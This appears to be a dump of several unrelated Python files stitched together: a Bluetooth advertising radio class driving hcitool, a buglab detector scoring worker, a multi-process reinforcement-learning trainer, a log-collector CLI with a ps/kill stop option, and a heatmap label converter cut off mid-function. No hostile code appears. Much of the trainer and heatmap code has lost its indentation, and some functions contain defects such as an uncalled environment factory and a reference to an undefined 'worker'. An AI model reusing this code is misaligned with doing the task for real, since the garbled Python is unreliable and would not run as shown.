    #           self._readQ.put(tmp)
    #       except bluetooth.btcommon.BluetoothError as e:
    #           if 'timed out' not in e:
    #               raise e
    #       finally:
    #           if client_sock is not None:
    #               client_sock.close()
    #   #
    # #
    def read(self):
        """
        Read from radio and return json object
        Non blocking
        """
        msg = None
        try:
            data = self._sock.recv(1024)
            if 'type' in data:
                # NOTE(review): payload offsets [21:-1] and address bytes
                # [12:6:-1] are hard-coded for this advert layout — verify
                # against the writer side if the payload format changes.
                msg = json.loads(''.join(x for x in data[21:-1]))
                addr = ':'.join("{0:02x}".format(ord(x)) for x in data[12:6:-1])
                msg['sentby'] = addr
        except timeout:
            # No packet within the socket timeout: report nothing.
            pass
        return msg
    #
    def write(self, data):
        """
        write json object to radio
        """
        FNULL = open(os.devnull, 'w')
        # Build the hcitool hex payload: manufacturer-specific (FF 4C 00)
        # advert data, with lengths computed from the hex byte count.
        payload = ' '.join("{0:02X}".format(ord(x)) for x in self._asString(data))
        length = ''.join("{0:02X}".format(len(payload.split()) + 3))
        total = ''.join("{0:02X}".format(len(payload.split()) + 7))
        msgCmd = 'hcitool -i hci0 cmd 0x08 0x0008 ' + total + ' 02 01 1A ' + length + ' FF 4C 00 ' + payload
        onCmd = 'hcitool -i hci0 cmd 0x08 0x000a 01'
        offCmd = 'hcitool -i hci0 cmd 0x08 0x000a 00'
        try:
            # Set the advertising data, then pulse advertising on and off.
            subprocess.call(msgCmd, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
            subprocess.call(onCmd, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
            subprocess.call(offCmd, shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
        except Exception as e:
            raise e
    #
#
#
#
|
detectordatascoringworker.py
|
import argparse
import logging
import math
import time
from itertools import cycle, islice
from tempfile import TemporaryDirectory
from threading import Thread
from typing import NoReturn
import msgpack
import torch
import zmq
from dpu_utils.utils import run_and_debug
from tqdm import tqdm
from buglab.controllers.helper.dummydatageneratingpipeline import get_data_from_folder
from buglab.data.modelsync import MockModelSyncClient, ModelSyncClient
from buglab.utils.logging import MetricProvider, configure_logging
from buglab.utils.replaybuffer import ReplayBuffer
metric_provider = MetricProvider("DetectorDataScoringWorker")
def queue_loader(replay_buffer: ReplayBuffer, data_pipeline_address: str) -> NoReturn:
    """A thread adding the received data into a queue."""
    # Subscribe to everything published on the data pipeline.
    ctx = zmq.Context.instance()
    sub_socket = ctx.socket(zmq.SUB)
    sub_socket.connect(data_pipeline_address)
    sub_socket.setsockopt_string(zmq.SUBSCRIBE, "")

    received_counter = metric_provider.new_counter(counter_name="incoming_messages")
    receive_latency = metric_provider.new_latency_measure(measure_name="incoming_latency")
    span_tracer = metric_provider.get_tracer()
    # Loop forever: each received msgpack message goes into the replay buffer.
    while True:
        with span_tracer.start_as_current_span("enqueue"), receive_latency:
            raw_message = sub_socket.recv()
            received_counter.inc()
            replay_buffer.add(msgpack.loads(raw_message))
def hydrate_replay_buffer(replay_buffer, path, num_elements):
    """Pre-fill the replay buffer with up to `num_elements` samples read from `path`."""
    sample_stream = islice(get_data_from_folder(path), num_elements)
    for sample in tqdm(sample_stream, desc="Hydrating replay buffer"):
        replay_buffer.add(sample)
LOGGER = logging.getLogger(__name__)
def run(args):
    """Main worker loop: score replay-buffer samples with the current bug
    detector model and forward the score-annotated graphs to the selector
    training queue. Runs forever (the cycle() iterable below never exhausts).
    """
    tracer = metric_provider.get_tracer()
    # Prefer GPU when available.
    model_device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
    print(f"Using {model_device}.")
    # Either a frozen model from disk or a live one refreshed from the server.
    if args.fixed_model_path is not None:
        model_sync_client = MockModelSyncClient(args.fixed_model_path)
    else:
        model_sync_client = ModelSyncClient(args.model_server_address, do_not_update_before_sec=5 * 60)
    model, nn = model_sync_client.ask(model_device)
    nn.eval()
    tmp = TemporaryDirectory()
    replay_gauge = metric_provider.new_gauge("replay_buffer_incoming_queue")
    replay_buffer = ReplayBuffer(backing_dir=tmp.name, gauge=replay_gauge, ttl=10)
    # Background daemon threads: one streams fresh samples from the pipeline,
    # one pre-fills the buffer from disk.
    data_input_thread = Thread(target=lambda: queue_loader(replay_buffer, args.data_pipeline_address), daemon=True)
    data_input_thread.start()
    hydration_thread = Thread(
        target=lambda: hydrate_replay_buffer(replay_buffer, args.initial_data_hydration_path, args.replay_buffer_size),
        name="replay_buffer_hydration_thread",
        daemon=True,
    )
    hydration_thread.start()
    time.sleep(20)  # Wait for buffer to be filled a bit.
    # The results are placed in a queue of another process. We model this as a synchronous request.
    context = zmq.Context.instance()
    socket = context.socket(zmq.REQ)
    socket.connect(args.target_queue_address)
    poller = zmq.Poller()
    poller.register(socket, zmq.POLLIN)
    outgoing_counter = metric_provider.new_counter(counter_name="outgoing_messages")
    queue_delay_measure = metric_provider.new_latency_measure("outgoing_latency")
    processing_time_measure = metric_provider.new_latency_measure("processing_time")
    for _ in tqdm(cycle(range(10))):  # while True:
        with tracer.start_as_current_span("Processing data point."):
            with tracer.start_as_current_span("Waiting for data."):
                data = list(replay_buffer.iter_batch(1))[0]
            processing_time_measure.start()
            with tracer.start_as_current_span("Getting ready for scoring."):
                graphs, rewrite_idxs = [], []
                for rewrite_idx, (graph, _) in data["rewrites"].items():
                    # The "NO_BUG" rewrite is encoded as index -1.
                    if rewrite_idx == "NO_BUG":
                        rewrite_idxs.append(-1)
                    else:
                        rewrite_idxs.append(int(rewrite_idx))
                    # NOTE(review): the idx was already appended above, so when
                    # graph is None, rewrite_idxs and graphs (and hence the
                    # predictions below) can go out of sync — verify intended.
                    if graph is None:
                        LOGGER.error(f"None element for graph. Rewrite_idx: {rewrite_idx}")
                        continue
                    graphs.append(graph)
                assert len(rewrite_idxs) == len(set(rewrite_idxs))
                original_graph = data["original"]
                num_rewrite_candidates = len(original_graph["graph"]["reference_nodes"])
                discriminator_rewrite_logprobs = [-math.inf] * (num_rewrite_candidates + 1)  # +1 for the NO_BUG case
            with tracer.start_as_current_span("Scoring."):
                model_sync_client.update_params_if_needed(nn, model_device)
                predictions = model.predict(graphs, nn, model_device, parallelize=not args.sequential)
                predictions = list(predictions)
            with tracer.start_as_current_span("Processing scores."):
                for i, (datapoint, location_logprobs, rewrite_logprobs) in enumerate(predictions):
                    target_fix_action_idx = datapoint["target_fix_action_idx"]
                    # A None target means "no bug": score is the last location logprob.
                    if target_fix_action_idx is None:
                        target_logprob = location_logprobs[-1]
                    else:
                        ground_node_idx = datapoint["graph"]["reference_nodes"][target_fix_action_idx]
                        target_logprob = (
                            location_logprobs[ground_node_idx] + rewrite_logprobs[target_fix_action_idx]
                        )
                    # rewrite_idxs[i] == -1 (NO_BUG) lands in the extra last slot.
                    discriminator_rewrite_logprobs[rewrite_idxs[i]] = float(
                        target_logprob
                    )  # Can't serialise numpy.float32 objects.
                original_graph["candidate_rewrite_logprobs"] = discriminator_rewrite_logprobs
            processing_time_measure.stop()
            with queue_delay_measure:
                with tracer.start_as_current_span("Sending detection scores data."):
                    serialized_graph = msgpack.dumps(original_graph)
                    socket.send(serialized_graph)
                    outgoing_counter.inc()
                with tracer.start_as_current_span("Waiting for confirmation of receipt."):
                    if poller.poll(60 * 1000):  # 1min
                        if not bool(socket.recv()):
                            LOGGER.warning(f"Error accepting data from {__package__}.")
                    else:
                        LOGGER.error(f"Timeout for sending data.")
                        # A REQ socket cannot be reused after a lost reply:
                        # recreate the socket and its poller.
                        socket.close()
                        socket = context.socket(zmq.REQ)
                        socket.connect(args.target_queue_address)
                        poller = zmq.Poller()
                        poller.register(socket, zmq.POLLIN)
if __name__ == "__main__":
    configure_logging()
    # CLI configuration for this worker.
    parser = argparse.ArgumentParser(
        description="Score original/buggy code adding the bug detection probabilities and forward the data to the bug selector training."
    )
    parser.add_argument(
        "initial_data_hydration_path",
        type=str,
        help="The path to hydrate the replay buffer upon startup.",
    )
    parser.add_argument(
        "--data-pipeline-address",
        type=str,
        default="tcp://localhost:5558",
        help="The zmq address to the data generating pipeline.",
    )
    parser.add_argument(
        "--replay-buffer-size",
        type=int,
        default=10000,
        help="The number of elements to pre-load in the replay buffer.",
    )
    parser.add_argument(
        "--target-queue-address",
        type=str,
        default="tcp://localhost:5559",
        help="The zmq address to the data accumulator queue.",
    )
    parser.add_argument(
        "--model-server-address",
        type=str,
        default="tcp://localhost:6000",
        help="The address to the bug detector model server.",
    )
    parser.add_argument(
        "--fixed-model-path",
        type=str,
        help="Use a fixed discriminator model, instead of asking for one from the server.",
    )
    parser.add_argument(
        "--prometheus-server-port",
        type=int,
        default=8000,
        help="The address to the prometheus server.",
    )
    parser.add_argument(
        "--enable-tracing",
        action="store_true",
        help="Set to enable recording tracing information.",
    )
    parser.add_argument(
        "--sequential",
        action="store_true",
        help="Should any computations happen sequentially?",
    )
    parser.add_argument(
        "--debug",
        action="store_true",
        help="Debug on exception.",
    )
    args = parser.parse_args()
    # Start metrics/tracing endpoints before entering the worker loop.
    metric_provider.start_server(args.prometheus_server_port)
    metric_provider.set_tracing(args.enable_tracing)
    run_and_debug(lambda: run(args), args.debug)
|
trainer.py
|
# -*- coding: utf-8 -*-
# @Time : 2020-01-31 22:18
# @Author : Enjoy Zhao
# @Describe : This file defines a Trainer class. It implements the training functions, including single- and multi-instance training; the reinforcement-learning training itself is carried out in the training simulator.
import multiprocessing as mp
from collections import namedtuple
import tensorflow as tf
import cloudpickle
from general.core import GrEexception
from general.memory import Transition
# Lightweight message pairing a reward with the following observation; used
# for parent<->child pipe traffic during multi-process training.
RewardState=namedtuple('RewardState',['reward','state'])
# Trainer: drives single- or multi-process training of an agent.
class Trainer:
    """Runs training/test loops for an agent against environments built by a factory."""

    def __init__(self, create_env, agent, mapping=None):
        """Store the environment factory, the agent and the optional instance mapping."""
        self.mapping = mapping
        self.agent = agent
        self.create_env = create_env
#定义train方法,根据配置对智能体进行训练
def train(self,max_steps=1000,instances=1,visualize=False,plot=None,max_subprocesses=0):
#将智能体设置为训练状态
self.agent.training=True
#如果是单进程训练,则调用_sp_train方法,如果是多进程训练则调用_mp_train方法
if max_subprocesses==0:
self._sp_train(max_steps,instances,visualize,plot)
elif max_subprocesses is None or max_subprocesses>0:
self._mp_train(max_steps,instances,visualize,plot,max_subprocesses)
else:
raise GrEexception(f"Invalid max_subprocesses setting: {max_subprocesses}")
#定义单进程训练方法
def _sp_train(self, max_steps, instances, visualize=False, plot=None):
"""
:param max_steps:最大训练步数
:param instances:训练智能体的数量
:param visualize:配置是否图形可视化,针对与gym适用
:param plot:画图函数,对训练步数和rewards进行画图
"""
#根据设置的instances的数量也就是智能体的数量,分别初始化reward、step、envs、states,用于训练过程的图形化展示
episode_reward_sequences=[[0] for _ in range(instances)]
episode_step_sequences=[[0] for _ in range(instances)]
episode_rewards=[0]*instances
envs=[self.create_env for _ in range(instances)]
states=[env.reset() for env in envs]
#训练步数在最大步数范围内开始循环训练
for step in range(max_steps):
#根据智能体的数量和是否进行图形可视化,进行环境可视化,这里只适用于gym环境
for i in range(instances):
if visualize:envs[i].render()
#将预测得到的action从Tensor转换为数值
action = tf.keras.backend.eval(self.agent.act(states[i], i))
#将预测得到的action输入给环境,获得环境反馈的下一个状态、reward、和是否结束的标记
next_state,reward,done, _=envs[i].step(action=action)
#将环境返回的数据、action作为一条记录保存到记忆存储器中
self.agent.push(Transition(states[i],action,reward,None if done else next_state),i)
#将reward进行累加
episode_rewards[i]+=reward
#如果环境给予结束的状态则将episode_rewards、训练步数给保存,episode_rewards清零后进行图形展示,如果不是结束状态则将状态更新为下一个状态。
if done:
episode_reward_sequences[i].append(episode_rewards[i])
episode_step_sequences[i].append(step)
episode_rewards[i]=0
if plot:
plot(episode_reward_sequences,episode_step_sequences)
states[i]=envs[i].reset()
else:
states[i]=next_state
#训练智能体,完成一步的训练
self.agent.train(step)
# 最后图形化展示整个训练过程的reward
if plot:plot(episode_reward_sequences,episode_step_sequences,done=True)
    # Multi-process training: schedules environment instances across child
    # processes and exchanges actions/rewards over pipes.
    def _mp_train(self, max_steps, instances, visualize, plot, max_subprocesses):
        """Train `instances` environments spread over up to `max_subprocesses`
        child processes (defaults to the CPU count when None)."""
        if max_subprocesses is None:
            max_subprocesses = mp.cpu_count()
        # Never start more processes than instances.
        nprocesses = min(instances, max_subprocesses)
        # Distribute instances evenly; spread the remainder one-per-process.
        instances_per_process = [instances // nprocesses] * nprocesses
        leftover = instances % nprocesses
        if leftover > 0:
            for i in range(leftover):
                instances_per_process[i] += 1
        # Instance ids handled by each process (round-robin assignment).
        instance_ids = [list(range(i, instances, nprocesses))[:ipp] for i, ipp in enumerate(instances_per_process)]
        pipes = []
        processes = []
        for i in range(nprocesses):
            child_pipes = []
            for j in range(instances_per_process[i]):
                # One duplex pipe per environment instance.
                parent, child = mp.Pipe()
                pipes.append(parent)
                child_pipes.append(child)
            # The env factory is cloudpickled so it survives the process boundary;
            # `_train` (module-level) is the child entry point.
            pargs = (cloudpickle.dumps(self.create_env), instance_ids[i], max_steps, child_pipes, visualize)
            processes.append(mp.Process(target=_train, args=pargs))
        print(f"Starting {nprocesses} process(es) for {instances} environment instance(s)... {instance_ids}")
        for p in processes: p.start()
        # Per-instance bookkeeping for plotting.
        episode_reward_sequences = [[] for _ in range(instances)]
        episode_step_sequences = [[] for _ in range(instances)]
        episode_rewards = [0] * instances
        # Last RewardState / action seen per instance (None until first message).
        rss = [None] * instances
        last_actions = [None] * instances
        for step in range(max_steps):
            # Wait until every instance has reported this step.
            step_done = [False] * instances
            while sum(step_done) < instances:
                awaiting_pipes = [p for iid, p in enumerate(pipes) if step_done[iid] == 0]
                ready_pipes = mp.connection.wait(awaiting_pipes, timeout=None)
                pipe_indexes = [pipes.index(rp) for rp in ready_pipes]
                pipe_indexes.sort()
                for iid in pipe_indexes:
                    # Receive the child's RewardState for this instance.
                    rs = pipes[iid].recv()
                    if rss[iid] is not None:
                        # Complete the previous transition and store it.
                        exp = Transition(rss[iid].state, last_actions[iid], rs.reward, rs.state)
                        self.agent.push(exp, iid)
                    step_done[iid] = True
                    rss[iid] = rs
                    if rs.state is None:
                        # Episode ended: record its reward and optionally plot.
                        rss[iid] = None
                        episode_reward_sequences[iid].append(episode_rewards[iid])
                        episode_step_sequences[iid].append(step)
                        episode_rewards[iid] = 0
                        if plot:
                            plot(episode_reward_sequences, episode_step_sequences)
                    else:
                        # Pick the next action and send it to the child.
                        action = self.agent.act(rs.state, iid)
                        last_actions[iid] = action
                        try:
                            pipes[iid].send(action)
                        except BrokenPipeError as bpe:
                            # A child exiting on the final step is expected.
                            if step < (max_steps - 1): raise bpe
                    if rs.reward: episode_rewards[iid] += rs.reward
            self.agent.train(step)
        if plot: plot(episode_reward_sequences, episode_step_sequences, done=True)
#定义测试方法,对完成训练的智能体进行测试
def test(self,max_steps,visualize=True):
#将智能体的网络设置测试状态
self.agent.training=False
#创建环境并初始化
env=self.create_env()
state=env.reset()
#在最大测试步数范围测试智能体与环境的交互
for step in range(max_steps):
if visualize:env.render()
action=tf.keras.backend.eval(self.agent.act(state))
next_state,reward,done,_=env.step(action)
state=env.reset() if done else next_state
# Child-process entry point for multi-process training; communicates with the
# parent Trainer over one pipe per environment instance.
def _train(create_env, instance_ids, max_steps, pipes, visualize):
    """Step the given environment instances, exchanging actions/RewardStates
    with the parent over `pipes`.

    :param create_env: cloudpickled environment factory
    :param instance_ids: ids of the instances handled by this process
    :param max_steps: number of training steps to run
    :param pipes: one child pipe end per instance (same order as instance_ids)
    :param visualize: render each environment every step (gym-style envs)
    """
    pipes = {iid: p for iid, p in zip(instance_ids, pipes)}
    actions = {iid: None for iid in instance_ids}
    create_env = cloudpickle.loads(create_env)
    # FIX: the factory must be CALLED once per instance; the original stored
    # the function object itself, so envs[iid].reset() below would fail.
    envs = {iid: create_env() for iid in instance_ids}
    # Send each instance's initial observation to the parent.
    for iid in instance_ids:
        state = envs[iid].reset()
        pipes[iid].send(RewardState(None, state))
    for step in range(max_steps):
        for iid in instance_ids:
            # Receive the parent's chosen action for this instance.
            actions[iid] = pipes[iid].recv()
            if visualize: envs[iid].render()
            next_state, reward, done, _ = envs[iid].step(actions[iid])
            pipes[iid].send(RewardState(reward, None if done else next_state))
            if done:
                # Episode ended: reset and report the fresh initial state.
                state = envs[iid].reset()
                pipes[iid].send(RewardState(None, state))
|
main.py
|
# coding=UTF-8
import time
from Src.Core import OutputCustomer,Reader,Base
from multiprocessing import Process
from threading import Thread
from webServer.start import start_web
import multiprocessing,os,click
def runReader(log_files_conf, config_name):
    """Build one Reader for a log-file config and run all of its jobs on threads.

    Jobs: one readLog, one cutFile, and one pushDataToQueue per CPU core.
    """
    reader = Reader(log_file_conf=log_files_conf, config_name=config_name)
    job_names = ['readLog', 'cutFile'] + ['pushDataToQueue'] * multiprocessing.cpu_count()
    workers = [Thread(target=reader.runMethod, args=(name,)) for name in job_names]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
def customer(config_name):
    """Consume queued log entries and persist them to the configured storage."""
    consumer = OutputCustomer(config_name)
    consumer.saveToStorage()
def analysis(confg_name):
    """Run the live traffic-watching loop for the given config."""
    watcher = OutputCustomer(confg_name)
    watcher.watchTraffic()
def getLogFilsDict(base):
    """Collect every `inputer.log_file.*` section from the parsed config.

    Returns a list of dicts, each the section's options plus an `app_name`
    key derived from the last dotted component of the section name.
    """
    sections = []
    for section_name in list(base.conf):
        if 'inputer.log_file' not in section_name:
            continue
        entry = dict(base.conf[section_name])
        entry['app_name'] = section_name.split('.')[-1]
        sections.append(entry)
    return sections
def startInputer(base, config):
    """Fork one reader process per configured log file and wait for them all."""
    workers = [Process(target=runReader, args=(conf, config,)) for conf in getLogFilsDict(base)]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
def startOutputer(base, config):
    """Fork the configured number of storage-consumer processes and wait for them.

    Reads `outputer.worker_process_num` from the config.
    """
    # fix: the loop variable was a garbled, unused name (`start_webi`).
    worker_count = int(base.conf['outputer']['worker_process_num'])
    workers = [Process(target=customer, args=(config,)) for _ in range(worker_count)]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
@click.command()
@click.option('-r', '--run', help="run type" ,type=click.Choice(['inputer', 'outputer','traffic','web']))
@click.option('-s', '--stop', help="stop the proccess" ,type=click.Choice(['inputer', 'outputer']))
@click.option('-c', '--config', help="config file name" )
def enter(run, stop, config):
    """CLI entry point: start/stop the inputer/outputer daemons, run traffic
    analysis, or serve the web UI — all driven by a config.ini file."""
    # fix: compare with None via identity, not `== None`.
    if config is None:
        print('please use "-c" to bind config.ini file')
        exit()
    base = Base(config_name=config)
    if run == 'inputer':
        # Daemonize: the parent exits, the child keeps running the readers.
        if os.fork() > 0:
            exit()
        startInputer(base, config)
    if run == 'outputer':
        if os.fork() > 0:
            exit()
        startOutputer(base, config)
    if run == 'traffic':
        analysis(config)
    if run == 'web':
        web_conf = dict(base.conf['web'])
        web_conf[web_conf['data_engine']] = dict(base.conf[web_conf['data_engine']])
        start_web(web_conf)
    if stop:
        # NOTE: shells out via os.popen; `stop` comes from a click.Choice and
        # `config` is a local file name, so both are operator-controlled input.
        if isinstance(config, str) and len(config):
            cmd = 'ps -ax | grep "main.py -r %s -c %s"' % (stop, config)
        else:
            cmd = 'ps -ax | grep "main.py -r %s"' % stop
        res = os.popen(cmd)
        pids = []
        print('|============================================================')
        for line in res.readlines():
            if line.find('grep') != -1:
                continue
            print('| %s ' % line.strip())
            pids.append(line.strip().split(' ')[0])
        if len(pids) == 0:
            print('| %s is not running ' % stop)
            print('|============================================================')
            exit('nothing happened . bye bye !')
        print('|============================================================')
        confirm = input('confirm: please enter [ yes | y ] or [ no | n ] : ')
        if confirm in ['yes','y'] and len(pids) > 0:
            os.popen('kill %s' % ' '.join(pids))
            exit('pid: %s was killed and %s is stoped. bye bye !' % (' '.join(pids) ,stop) )
        else:
            exit('nothing happened . bye bye !')
if __name__ == "__main__":
    # CLI entry point; click parses the -r/-s/-c options.
    enter()
|
points_to_heatmaps.py
|
import json
import numpy as np
from skimage.draw import line
from pathlib import Path
import pdb
import cv2
import math
import matplotlib.pyplot as plt
import os
import shutil
from time import sleep
import multiprocessing
import time
import pdb
from .helper import get_labels, replace_values
from fastprogress.fastprogress import progress_bar
from skimage.morphology.convex_hull import convex_hull_image
class LABELS_TO_HEATMAPS_COMVERTER:
    """Converts point/line/polygon labels into per-feature heatmap images.

    Reads a label JSON plus the source images under `root_path` and writes,
    per feature, heatmaps, masks, an optional convex hull, optional painted
    debug images, and resized final images.
    """

    def __init__(self, root_path, img_path, json_path, features, target_size=512, image_ext="png",
                 scales=[0.0], crop_margin=0, file_name_function=None, final_images_path="final_images",
                 painted_images_path=None, convex_hull_features=[], hull_path="hull",
                 replacements=None, process_output_image=None, mask_dilation=1, save_output_img=True):
        """Store the conversion configuration; no I/O happens here."""
        # Input locations.
        self.__root_path = root_path
        self.__img_path = img_path
        self.__json_path = json_path
        # What to convert and how.
        self.__features = features
        self.__replacements = replacements
        self.__image_ext = image_ext
        self.__target_size = target_size
        self.__scales = scales
        self.__crop_margin = crop_margin
        self.mask_dilation = mask_dilation
        # Convex-hull configuration.
        self.__convex_hull_features = convex_hull_features
        self.__hull_path = hull_path
        # Output configuration.
        self.__final_images_path = final_images_path
        self.__painted_images_path = painted_images_path
        self.__save_output_img = save_output_img
        self.__process_output_image = process_output_image
        # Default file naming: "<Labeled Data>.<ext>".
        self.__file_name_function = file_name_function if file_name_function is not None else lambda label, image_ext: label["Labeled Data"]+ "."+ image_ext
def process(self):
labels = json.load(open(self.__root_path/self.__json_path,"r"))
self.manage_folders()
replace_values(labels, self.__replacements)
self.new_process(labels)
def process_multithread(self):
raise("`process_multithread` is not working now")
starttime = time.time()
labels = json.load(open(self.__json_path,"r"))
self.manage_folders()
replace_values(labels, self.__replacements)
cpu_count = round(multiprocessing.cpu_count()/2)
imgs_pre_thread = round(len(labels) / cpu_count)
idx = 1
processes = []
labels_for_thread = []
for label in labels:
labels_for_thread.append(label)
if idx%imgs_pre_thread == 0:
p = multiprocessing.Process(target=worker.new_process, args=(labels_for_thread,))
processes.append(p)
labels_for_thread = []
idx=1
else:
idx+=1
if len(labels_for_thread)< imgs_pre_thread:
p = multiprocessing.Process(target=worker.new_process, args=(labels_for_thread,))
processes.append(p)
for process in processes:
process.start()
for process in processes:
process.join()
print('That took {} seconds'.format(time.time() - starttime))
def manage_folders(self):
if self.__save_output_img:
if os.path.exists(self.__root_path/self.__final_images_path):
shutil.rmtree(self.__root_path/self.__final_images_path)
sleep(0.1)
os.mkdir(self.__root_path/self.__final_images_path)
if self.__painted_images_path is not None:
if os.path.exists(self.__root_path/self.__painted_images_path):
shutil.rmtree(self.__root_path/self.__painted_images_path)
sleep(0.1)
os.mkdir(self.__root_path/self.__painted_images_path)
if os.path.exists(self.__root_path/self.__hull_path):
shutil.rmtree(self.__root_path/self.__hull_path)
sleep(0.1)
os.mkdir(self.__root_path/self.__hull_path)
for key in self.__features.keys():
if os.path.exists(self.__root_path/key):
shutil.rmtree(self.__root_path/key)
sleep(0.1)
os.mkdir(self.__root_path/key)
def get_all_points(self,all_pts):
all_points = np.array([[0,0]])
for key in all_pts.keys():
if len(all_pts[key]) > 0:
all_points = np.concatenate((all_points,all_pts[key]))
return np.delete(all_points,0,axis=0).astype(np.int)
def adjust_labels_zoomed(self,label_data, x_diff, y_diff):
new_label_data = {}
for key in label_data.keys():
new_label_data[key] = []
for point in label_data[key]:
new_label_data[key].append((point[0] - x_diff,point[1] - y_diff))
new_label_data[key] = np.array(new_label_data[key])
return new_label_data
def adjust_labels_squared(self,label_data, value, orientation):
new_label_data = {}
for key in label_data.keys():
new_label_data[key] = []
for point in label_data[key]:
new_x = point[0] - value if orientation == "landscape" else point[0]
new_y = point[1] if orientation == "landscape" else point[1] - value
new_label_data[key].append((new_x,new_y))
new_label_data[key] = np.array(new_label_data[key])
return new_label_data
def adjust_labels_sized(self,label_data, old_square_shape, new_square_shape):
new_label_data = {}
for key in label_data.keys():
new_label_data[key] = []
for point in label_data[key]:
new_x = round(new_square_shape*(point[0]/old_square_shape))
new_y = round(new_square_shape*(point[1]/old_square_shape))
new_label_data[key].append((new_x,new_y))
new_label_data[key] = np.array(new_label_data[key])
return new_label_data
def zoom_image(self,label_data, img, scale):
all_points = self.get_all_points(label_data)
if len(all_points) == 0:
return label_data, img
bb = cv2.boundingRect(all_points)
x_from = round(bb[0]*scale)
x_to = round(img.shape[1]-((img.shape[1]-(bb[0]+bb[2]))*scale))
y_from = round(bb[1]*scale)
y_to = round(img.shape[0]-((img.shape[0]-(bb[1]+bb[3]))*scale))
img_zoomed = img[y_from:y_to,x_from:x_to,:]
zoomed_label_data = self.adjust_labels_zoomed(label_data,x_from, y_from)
return zoomed_label_data, img_zoomed
    def square_image(self,zoomed_label_data, img_zoomed):
        """Crop the longer side of the image to make it square, choosing the
        crop side(s) so labelled points stay inside, and shift labels to match."""
        all_points = self.get_all_points(zoomed_label_data)
        if len(all_points) == 0:
            return zoomed_label_data, img_zoomed
        orientation = "landscape" if img_zoomed.shape[1] > img_zoomed.shape[0] else "portrait"
        # Total number of pixels to remove along the longer axis.
        crop_v = abs(img_zoomed.shape[1] - img_zoomed.shape[0])
        if crop_v < 2:
            return zoomed_label_data, img_zoomed
        # Label extent along the axis being cropped.
        min_v = all_points[:,0].min() if orientation == "landscape" else all_points[:,1].min()
        max_v = all_points[:,0].max() if orientation == "landscape" else all_points[:,1].max()
        # NOTE(review): the elif below compares against img_zoomed.shape[1]
        # regardless of orientation — for portrait images shape[0] looks
        # intended; confirm before relying on the portrait path.
        if min_v < ((crop_v/2)+self.__crop_margin):
            # cut from HIGH
            img_squared = img_zoomed[:,:-crop_v,:] if orientation == "landscape" else img_zoomed[:-crop_v,:,:]
            squared_label_data = self.adjust_labels_squared(zoomed_label_data,0,orientation)
        elif max_v > img_zoomed.shape[1] - ((crop_v/2)+self.__crop_margin):
            # cut LOW
            img_squared = img_zoomed[:,crop_v:,:] if orientation == "landscape" else img_zoomed[crop_v:,:,:]
            squared_label_data = self.adjust_labels_squared(zoomed_label_data,crop_v,orientation)
        else:
            # cut from LOW AND HIGH
            img_squared = img_zoomed[:,int(crop_v/2):-int(crop_v/2),:] if orientation == "landscape" else img_zoomed[int(crop_v/2):-int(crop_v/2),:,:]
            squared_label_data = self.adjust_labels_squared(zoomed_label_data, int(crop_v/2),orientation)
        return squared_label_data,img_squared
def size_image(self,squared_label_data, img_squared):
all_points = self.get_all_points(squared_label_data)
if len(all_points) == 0:
img_sized = cv2.resize(img_squared, (self.__target_size, self.__target_size), interpolation = cv2.INTER_CUBIC)
return squared_label_data, img_sized
img_sized = cv2.resize(img_squared, (self.__target_size, self.__target_size), interpolation = cv2.INTER_CUBIC)
sized_label_data = self.adjust_labels_sized(squared_label_data, img_squared.shape[1],self.__target_size)
return sized_label_data,img_sized
def make_point_heat(self,pt, shape, h, initial_itensity = None):
if type(shape) == int:
shape = [shape, shape]
#DEFINE GRID SIZE AND RADIUS(h)
grid_size=1
#FUNCTION TO CALCULATE INTENSITY WITH QUARTIC KERNEL
def kde_quartic(d,h):
dn=d/h
P=(15/16)*(1-dn**2)**2
return P
def kde_linear(d,h):
return 1-(d/h)
#PROCESSING
if initial_itensity is None:
itensity = np.zeros(shape, dtype=np.float32)
else:
itensity = initial_itensity
try:
if pt[1]-h < 0:
h = h - abs(pt[1]-h)
if pt[0]-h < 0:
h = h - abs(pt[0]-h)
if pt[1]+h > shape[0]:
h = h - ((pt[1]+h)-shape[0])
if pt[0]+h > shape[1]:
h = h - ((pt[0]+h)-shape[1])
for x_p in range(pt[1]-h, pt[1]+h):
for y_p in range(pt[0]-h, pt[0]+h):
d=math.sqrt((x_p-pt[1])**2+(y_p-pt[0])**2)
if d<=h:
itensity[x_p,y_p] = kde_linear(d,h)
except:
pdb.set_trace()
print("exception")
return itensity
def get_orth_vektor_from_points(self,P,Q):
return np.array([Q[1] - P[1],P[0] - Q[0]])
def check_neighbors_of_zero_and_interpolate(self,mask,p):
# check neighbors of point in mask of zeroes. Using 4er neighborhood. neighbors with no black pixels interpolate
try:
kernel = np.array([[-1,0],[0,-1],[0,1],[1,0]])
pixels = kernel + p
if len(np.where(mask[pixels[:,0],pixels[:,1]] == 0)[0]) < 2:
mask[p[0],p[1]] = np.mean(mask[pixels[:,0],pixels[:,1]]).round(2)
except:
pass
def fill_holes(self,orth_lines, mask):
# get boundaries of line segment
if len(orth_lines) == 0:
return
boundaries = np.where(orth_lines[:,2] == 0)[0]
if len(boundaries) < 4:
return
boundaries = boundaries[[0,1,-2,-1]]
x_min = orth_lines[boundaries][:,0].astype(np.int).min()
x_max = orth_lines[boundaries][:,0].astype(np.int).max()
y_min = orth_lines[boundaries][:,1].astype(np.int).min()
y_max = orth_lines[boundaries][:,1].astype(np.int).max()
x_min = x_min if x_min >0 else 1
x_max = x_max if x_max<mask.shape[1]-2 else mask.shape[1]-3
y_min = y_min if y_min >0 else 1
y_max = y_max if y_max<mask.shape[0]-2 else mask.shape[0]-3
# get black pixels in segment
mask_t = np.copy(mask[y_min-1:y_max+2,x_min-1:x_max+2])
mask_t[[0,-1],:] = 1
mask_t[:,[0,-1]] = 1
# get black pixels
black_pixels = np.array(np.where(mask_t == 0)).T
# check wether pixel is surrounded of non black pixels and interpolate
# TODO MAKE FAST
for black_pixel in black_pixels:
self.check_neighbors_of_zero_and_interpolate(mask[y_min-1:y_max+2,x_min-1:x_max+2],black_pixel)
def make_line_heat(self,p1,p2, mask, heat_radius):
#try:
discrete_line = np.array(list(zip(*line(*p1, *p2))))
orth_vector = self.get_orth_vektor_from_points(p1,p2)
if np.sqrt(np.sum(orth_vector**2)) == 0.0:
